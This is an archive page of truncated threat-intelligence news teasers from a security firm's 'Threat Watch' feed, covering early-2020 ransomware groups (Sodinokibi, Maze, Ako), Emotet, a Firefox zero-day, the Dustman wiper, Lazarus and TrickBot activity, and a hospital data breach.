Traditional ransomware encrypts a victim’s data and demands a ransom payment to decrypt it. Companies are able to defend against traditional ransomware by maintaining an up-to-date secure backup so that files can be restored without paying criminals. The attackers behind…
Tag: Threat Watch – Binary Defense
Sodinokibi Operators Follow Through on Threats
After the December infection of CyrusOne, the operators of the ransomware known as Sodinokibi made it clear they weren’t happy with victims being able to successfully recover their files without paying their ransom demand. A forum post by a representative…
Silence Targeting Banks in Sub-Saharan Africa
Silence: The cyber-crime group Silence has been active again, targeting financial institutions in sub-Saharan Africa. Recently, researchers have flagged thousands of notifications of attacks on major financial institutions throughout the region. The malware used, as well as the timeline of…
Maze Ransomware Operators Continue Release of Victim Data
Maze: The threat actors behind the Maze ransomware have returned to publicly releasing data stolen from victim companies. This return comes following a brief reprieve for victims after the group had lost their hosting provider. The threat group obtained a…
Emotet Returns for a New Year of Spam
As per our analysts’ assessment, Emotet has resumed operations after a holiday break on January 13, 2020. Emotet is a widespread threat to businesses and organizations that uses infected computers to send an email with malicious document attachments that will…
Ako Ransomware
It seems that every day new ransomware is targeting businesses, looking for a multi-million-dollar payday. Today is no different–a victim posted on the BleepingComputer support forums that they were infected with ransomware that had encrypted both their Windows 10 desktop…
Firefox 0-day Being Abused in the Wild
The Mozilla Foundation issued a security advisory for users of its Firefox web browser on January 8th. Originally reported to Mozilla by the security firm Qihoo 360, CVE-2019-17026 involves Firefox’s IonMonkey JavaScript Just-in-Time (JIT) compiler. A JIT compiler is responsible…
New Dustman Wiper Malware Shows Links to Iran
Iran: A new wiper malware that has been named Dustman was reportedly linked to Iran, based on the similarities it shares with previous Iranian malware ZeroCleare and the original Shamoon wiper malware. The link was made based on the common…
Lazarus Group Carries Out Continuation of Operation AppleJeus
North Korea (Lazarus Group): In 2018, Lazarus Group was linked to an operation that was dubbed “AppleJeus.” This operation was unique in the fact that it was the first time that Lazarus Group was noted targeting macOS. Recent analysis has…
New Trickbot Powershell stager “PowerTrick” for High-Value-Targets
Researchers from Sentinal Labs have discovered a new PowerShell stager (PowerTrick) which is used by TrickBot as an Interactive Network Exploitation shell. Along with the ability to download the DNS-based Anchor malware, this stager typically also uses PowerView, Invoke-SessionGopher, Get-GPPPassword,…
Minnesota Hospital Suffers Data Breach
Alomere Health, a Minnesota based healthcare provider, suffered a data breach affecting nearly 50,000 patients. This situation was caused by two employee email accounts being compromised between October 31st, 2019 and November 6th, 2019, the same day the breach was…